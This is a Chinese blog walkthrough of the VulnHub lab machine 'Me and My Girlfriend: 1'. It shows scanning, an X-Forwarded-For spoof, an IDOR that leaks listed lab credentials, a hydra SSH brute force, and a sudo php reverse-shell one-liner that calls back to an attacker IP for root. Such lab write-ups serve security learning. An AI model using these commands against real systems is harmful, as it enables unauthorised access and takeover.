vulnhub靶机

vulnhub靶场:ME AND MY GIRLFRIEND: 1

靶机下载地址:http://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/
实验环境:VMware,kali虚拟机

实战WP

寻找靶机ip,arp-scan -l,发现靶机IP为192.168.46.131(如果得不到靶机的地址,可能是因为靶机的网卡信息不对参考:https://blog.csdn.net/asstart/article/details/103433065)
在这里插入图片描述
nmap扫描端口开放情况,发现开放了22和80端口

nmap  192.168.46.131

在这里插入图片描述
访问80端口提示只能从本地访问
在这里插入图片描述
尝试爆破目录,没有什么发现

dirb http://192.168.46.131

在这里插入图片描述
F12查看源码,提示使用x-forwarded-for
在这里插入图片描述
使用插件增加一个x-forwarded-for值127.0.0.1
在这里插入图片描述
修改后发现访问成功
在这里插入图片描述
发现有注册功能,尝试注册一个账号登录进去,登录成功
在这里插入图片描述
可以发现上面有一个id值,修改id值发现其他用户的账号密码
在这里插入图片描述
逐个测试发现存在12条记录,得到7个用户名和密码

eweuhtandingan:skuyatuh
aingmaung:qwerty!!!
sundatea:indONEsia
sedihaingmah:cedihhihihi
alice:4lic3
abdikasepak:dorrrrr
aa:aa

利用hydry,加载刚才得到的账号密码作为字典进行爆破

hydra -C 1.txt ssh://192.168.46.131

在这里插入图片描述
爆破出一个可用用户账号alice,密码4lic3,进行ssh连接

ssh alice@192.168.46.131

在这里插入图片描述
ls-al查看所以文件
在这里插入图片描述
发现一个my_secret,查看内容得到一个flag
在这里插入图片描述
接下来提权到root,溢出提权什么的,先不操作,因为是靶机,大多都有sudo滥用提权,直接sudo -l 查看,看到php命令不需要root密码即可使用
在这里插入图片描述
使用nc来反弹shell
在这里插入图片描述
在靶机上的alice创建一个php反弹shell去连接它

sudo /usr/bin/php -r '$sock=fsockopen("192.168.1.128",6666);exec("/bin/bash -i <&3 >&3 2>&3");'

在这里插入图片描述
返回kaili发现已经连接上
在这里插入图片描述
在root下发现flag2.txt,打开发现第二个flag
在这里插入图片描述
完成

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值